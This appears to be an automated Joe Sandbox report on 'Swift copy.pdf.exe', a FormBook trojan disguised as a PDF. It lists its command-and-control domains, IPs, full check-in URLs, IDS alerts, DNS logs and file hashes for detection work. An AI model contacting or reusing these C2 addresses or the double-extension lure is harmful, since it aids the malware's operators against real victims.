          Swift copy.pdf.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.Swift copy.pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          wapgoals.com | 0% | Virustotal |
          marktheoilguy.com | 0% | Virustotal |
          www.rileysboutique.com | 0% | Virustotal |
          technomark.xyz | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Reputation
          hosted.fireside.fm | 45.33.51.100 | true | false | high
          wapgoals.com | 34.102.136.180 | true | false | unknown
          marktheoilguy.com | 184.168.131.241 | true | true | unknown
          www.rileysboutique.com | 74.208.236.87 | true | true | unknown
          technomark.xyz | 174.136.25.55 | true | true | unknown
          www.stepmed.life | 5.101.123.53 | true | true | unknown
          agenciaorange.net | 51.222.80.112 | true | true | unknown
          www.indiafoodtraveling.com | 204.11.56.48 | true | true | unknown
          www.agenciaorange.net | unknown | unknown | true | unknown
          www.lehoachi.com | unknown | unknown | true | unknown
          www.marktheoilguy.com | unknown | unknown | true | unknown
          www.technomark.xyz | unknown | unknown | true | unknown
          www.wapgoals.com | unknown | unknown | true | unknown
          www.criticalredux.com | unknown | unknown | true | unknown

                              Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.criticalredux.com/ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t | true | Avira URL Cloud: safe | unknown
          www.wapgoals.com/ifne/ | true | Avira URL Cloud: safe | low
          http://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t | true | Avira URL Cloud: safe | unknown
          http://www.wapgoals.com/ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t | false | Avira URL Cloud: safe | unknown
          http://www.rileysboutique.com/ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t | true | Avira URL Cloud: safe | unknown
          http://www.indiafoodtraveling.com/ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t | true | Avira URL Cloud: safe | unknown

                              URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://en.wSwift copy.pdf.exe, 00000000.00000003.328158175.0000000005739000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://i4.cdn-image.com/__media__/pics/12471/arrow.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.carterandcone.comlSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                          unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.ascendercorp.com/typedesigners.htmlvSwift copy.pdf.exe, 00000000.00000003.332048994.000000000576D000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.founder.com.cn/cnSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlSwift copy.pdf.exe, 00000000.00000003.334358377.0000000005765000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.commSwift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cnd&~uSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              http://www.fontbureau.com/designers8Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.zhongyicts.com.cno.nSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fontbureau.comltom4~gSwift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                http://www.jiyu-kobo.co.jp/o.HSwift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/libgh.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/libg.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/kwbg.jpg)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown

                                                                Contacted IPs


                                                                Public

IP              Domain                        Country                    ASN      ASN Name                        Malicious
174.136.25.55   technomark.xyz                United States              33494    IHNETUS                         true
204.11.56.48    www.indiafoodtraveling.com    Virgin Islands (BRITISH)   40034    CONFLUENCE-NETWORK-INCVG        true
45.33.51.100    hosted.fireside.fm            United States              63949    LINODE-APLinodeLLCUS            false
74.208.236.87   www.rileysboutique.com        United States              8560     ONEANDONE-ASBrauerstrasse48DE   true
34.102.136.180  wapgoals.com                  United States              15169    GOOGLEUS                        false
51.222.80.112   agenciaorange.net             France                     16276    OVHFR                           true
5.101.123.53    www.stepmed.life              Estonia                    198068   PAGM-ASEE                       true

                                                                General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385261
Start date: 12.04.2021
Start time: 09:13:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 10s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Swift copy.pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/1@10/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 21% (good quality ratio 19.5%)
• Quality average: 73.4%
• Quality standard deviation: 30.5%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 92.122.145.220, 205.185.216.42, 205.185.216.10, 52.255.188.83, 40.88.32.150, 92.122.213.194, 92.122.213.247, 52.147.198.201, 104.43.193.48, 2.20.142.210, 2.20.142.209, 52.155.217.156, 104.43.139.144, 20.54.26.129, 172.217.168.51, 184.30.20.56, 20.50.102.62, 104.42.151.234
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, ghs.google.com, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

Time      Type              Description
09:14:27  API Interceptor   1x Sleep call for process: Swift copy.pdf.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs


                                                                Domains

                                                                No context

                                                                ASN

                                                                • 173.230.145.224
                                                                CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                • 45.56.127.45
                                                                gunzipped.exeGet hashmaliciousBrowse
                                                                • 45.56.119.148
                                                                frox0cheats.exeGet hashmaliciousBrowse
                                                                • 176.58.123.25
                                                                nDHV6wKWHF.exeGet hashmaliciousBrowse
                                                                • 172.104.164.58
                                                                OfficeConsultPlugin.exeGet hashmaliciousBrowse
                                                                • 109.237.24.104
                                                                RFQ#798606.exeGet hashmaliciousBrowse
                                                                • 45.56.119.148
                                                                Private doc.docmGet hashmaliciousBrowse
                                                                • 109.237.24.104
                                                                lK8vF3n2e7.exeGet hashmaliciousBrowse
                                                                • 172.104.233.225
                                                                newordermx.exeGet hashmaliciousBrowse
                                                                • 45.33.2.79
                                                                sample.exeGet hashmaliciousBrowse
                                                                • 66.228.32.51
                                                                BnJvVt951o.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                BnJvVt951o.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                SMtbg7yHyR.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                9fdUNaHzLv.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                Private doc.docmGet hashmaliciousBrowse
                                                                • 212.71.251.238
                                                                invoice_document.docmGet hashmaliciousBrowse
                                                                • 212.71.251.238
                                                                sample.exe.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                Document_Opener.exe.14.exeGet hashmaliciousBrowse
                                                                • 88.80.186.210

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift copy.pdf.exe.log
                                                                Process:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1314
                                                                Entropy (8bit):5.350128552078965
                                                                Encrypted:false
                                                                SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.760448355080477
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:Swift copy.pdf.exe
                                                                File size:846848
                                                                MD5:5946d0ee4becb515a1cf39ef3f3dde56
                                                                SHA1:3321193ab8c09ab1098d8104afd021145eca89c3
                                                                SHA256:2e2c3bd3883976fc398bc30cadaa16043e792861e7b12db344cd285375df8605
                                                                SHA512:426b9cf314fbb2e97ce6b0a32a715e96b669435743a04403f4be8006c4e0d50ea038ea3d689d43216fe8a1fdb60e780395856506869b13a8cf2f2570b39d3748
                                                                SSDEEP:12288:g7Z5LlLscvSGSaabV/HhLaeOYeEKJgUNdaxRPWId1u2KudAA:g7Z5tdqGSamV/BLa3YBQpIdQMA
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..Z...........y... ........@.. .......................@............@................................

                                                                File Icon

                                                                Icon Hash:6eecccccd6d2f2f2

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4b798e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x607393D5 [Mon Apr 12 00:27:01 2021 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]

                                                                Data Directories

                                                                Name                                  Virtual Address  Virtual Size  Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0xb793c          0x4f          .text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb8000          0x18cb0       .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd2000          0xc           .reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                Sections

                                                                Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                .text   0x2000           0xb5994       0xb5a00   False     0.955060650379   data       7.95048824536   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc   0xb8000          0x18cb0       0x18e00   False     0.147240106784   data       4.33709757552   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc  0xd2000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                Name           RVA      Size     Type  Language  Country
                                                                RT_ICON        0xb81f0  0x25a8   dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON        0xba798  0x10a8   dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON        0xbb840  0x468    GLS_BINARY_LSB_FIRST
                                                                RT_ICON        0xbbca8  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON        0xbfed0  0x10828  dBase III DBT, version number 0, next free block index 40
                                                                RT_GROUP_ICON  0xd06f8  0x4c     data
                                                                RT_VERSION     0xd0744  0x37e    data
                                                                RT_MANIFEST    0xd0ac4  0x1ea    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLL          Import
                                                                mscoree.dll  _CorExeMain

                                                                Version Infos

                                                                Description       Data
                                                                Translation       0x0000 0x04b0
                                                                LegalCopyright    Copyright 2012
                                                                Assembly Version  8.1.1.15
                                                                InternalName      DefaultDecoder.exe
                                                                FileVersion       8.1.1.14
                                                                CompanyName       Landskip Yard Care
                                                                LegalTrademarks   A++
                                                                Comments
                                                                ProductName       LevelActivator
                                                                ProductVersion    8.1.1.14
                                                                FileDescription   LevelActivator
                                                                OriginalFilename  DefaultDecoder.exe

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                Timestamp                 Protocol  SID      Message                                        Source Port  Dest Port  Source IP        Dest IP
                                                                04/12/21-09:14:18.225439  ICMP      384      ICMP PING                                                              192.168.2.6      205.185.216.42
                                                                04/12/21-09:14:18.260348  ICMP      449      ICMP Time-To-Live Exceeded in Transit                                  84.17.52.126     192.168.2.6
                                                                04/12/21-09:14:18.261599  ICMP      384      ICMP PING                                                              192.168.2.6      205.185.216.42
                                                                04/12/21-09:14:18.296841  ICMP      449      ICMP Time-To-Live Exceeded in Transit                                  5.56.20.161      192.168.2.6
                                                                04/12/21-09:14:18.297228  ICMP      384      ICMP PING                                                              192.168.2.6      205.185.216.42
                                                                04/12/21-09:14:18.343108  ICMP      449      ICMP Time-To-Live Exceeded in Transit                                  81.95.2.138      192.168.2.6
                                                                04/12/21-09:14:18.365600  ICMP      384      ICMP PING                                                              192.168.2.6      205.185.216.42
                                                                04/12/21-09:14:18.416953  ICMP      449      ICMP Time-To-Live Exceeded in Transit                                  151.139.80.6     192.168.2.6
                                                                04/12/21-09:14:18.417375  ICMP      384      ICMP PING                                                              192.168.2.6      205.185.216.42
                                                                04/12/21-09:14:18.467174  ICMP      449      ICMP Time-To-Live Exceeded in Transit                                  151.139.80.13    192.168.2.6
                                                                04/12/21-09:14:18.467592  ICMP      384      ICMP PING                                                              192.168.2.6      205.185.216.42
                                                                04/12/21-09:14:18.517415  ICMP      408      ICMP Echo Reply                                                        205.185.216.42   192.168.2.6
                                                                04/12/21-09:15:16.607167  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49726        80         192.168.2.6      34.102.136.180
                                                                04/12/21-09:15:16.607167  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49726        80         192.168.2.6      34.102.136.180
                                                                04/12/21-09:15:16.607167  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49726        80         192.168.2.6      34.102.136.180
                                                                04/12/21-09:15:16.906033  TCP       1201     ATTACK-RESPONSES 403 Forbidden                 80           49726      34.102.136.180   192.168.2.6
                                                                04/12/21-09:15:46.929966  ICMP      399      ICMP Destination Unreachable Host Unreachable                          212.107.37.82    192.168.2.6
                                                                04/12/21-09:15:49.942047  ICMP      399      ICMP Destination Unreachable Host Unreachable                          212.107.37.82    192.168.2.6
                                                                04/12/21-09:15:55.942216  ICMP      399      ICMP Destination Unreachable Host Unreachable                          212.107.37.82    192.168.2.6
                                                                04/12/21-09:16:08.022386  ICMP      399      ICMP Destination Unreachable Host Unreachable                          212.107.37.82    192.168.2.6
                                                                04/12/21-09:16:10.229217  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49753        80         192.168.2.6      51.222.80.112
                                                                04/12/21-09:16:10.229217  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49753        80         192.168.2.6      51.222.80.112
                                                                04/12/21-09:16:10.229217  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49753        80         192.168.2.6      51.222.80.112
                                                                04/12/21-09:16:11.838430  ICMP      399      ICMP Destination Unreachable Host Unreachable                          212.107.37.82    192.168.2.6
                                                                04/12/21-09:16:17.838594  ICMP      399      ICMP Destination Unreachable Host Unreachable                          212.107.37.82    192.168.2.6
                                                                04/12/21-09:16:27.838107  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49758        80         192.168.2.6      184.168.131.241
                                                                04/12/21-09:16:27.838107  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49758        80         192.168.2.6      184.168.131.241
                                                                04/12/21-09:16:27.838107  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49758        80         192.168.2.6      184.168.131.241

                                                                Network Port Distribution

                                                                TCP Packets


                                                                UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 09:15:16.486033916 CEST | 192.168.2.6 | 8.8.8.8 | 0x4c84 | Standard query (0) | www.wapgoals.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:15:21.921116114 CEST | 192.168.2.6 | 8.8.8.8 | 0xbe3f | Standard query (0) | www.criticalredux.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:15:27.423146963 CEST | 192.168.2.6 | 8.8.8.8 | 0x36c9 | Standard query (0) | www.rileysboutique.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:15:37.885531902 CEST | 192.168.2.6 | 8.8.8.8 | 0xace4 | Standard query (0) | www.lehoachi.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:15:43.797285080 CEST | 192.168.2.6 | 8.8.8.8 | 0xdc16 | Standard query (0) | www.stepmed.life | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:05.676117897 CEST | 192.168.2.6 | 8.8.8.8 | 0xc251 | Standard query (0) | www.stepmed.life | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:09.921472073 CEST | 192.168.2.6 | 8.8.8.8 | 0x23ce | Standard query (0) | www.agenciaorange.net | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:15.510679007 CEST | 192.168.2.6 | 8.8.8.8 | 0x752e | Standard query (0) | www.technomark.xyz | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:21.681616068 CEST | 192.168.2.6 | 8.8.8.8 | 0x3b69 | Standard query (0) | www.indiafoodtraveling.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:27.560142994 CEST | 192.168.2.6 | 8.8.8.8 | 0xffd4 | Standard query (0) | www.marktheoilguy.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 09:15:16.559525013 CEST | 8.8.8.8 | 192.168.2.6 | 0x4c84 | No error (0) | www.wapgoals.com | wapgoals.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:15:16.559525013 CEST | 8.8.8.8 | 192.168.2.6 | 0x4c84 | No error (0) | wapgoals.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:15:21.996145964 CEST | 8.8.8.8 | 192.168.2.6 | 0xbe3f | No error (0) | www.criticalredux.com | hosted.fireside.fm | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:15:21.996145964 CEST | 8.8.8.8 | 192.168.2.6 | 0xbe3f | No error (0) | hosted.fireside.fm | - | 45.33.51.100 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:15:27.501125097 CEST | 8.8.8.8 | 192.168.2.6 | 0x36c9 | No error (0) | www.rileysboutique.com | - | 74.208.236.87 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:15:38.267961025 CEST | 8.8.8.8 | 192.168.2.6 | 0xace4 | No error (0) | www.lehoachi.com | ghs.google.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:15:43.857230902 CEST | 8.8.8.8 | 192.168.2.6 | 0xdc16 | No error (0) | www.stepmed.life | - | 5.101.123.53 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:05.736423969 CEST | 8.8.8.8 | 192.168.2.6 | 0xc251 | No error (0) | www.stepmed.life | - | 5.101.123.53 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:16:10.090064049 CEST | 8.8.8.8 | 192.168.2.6 | 0x23ce | No error (0) | www.agenciaorange.net | agenciaorange.net | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:16:10.090064049 CEST | 8.8.8.8 | 192.168.2.6 | 0x23ce | No error (0) | agenciaorange.net | - | 51.222.80.112 | A (IP address) | IN (0x0001)
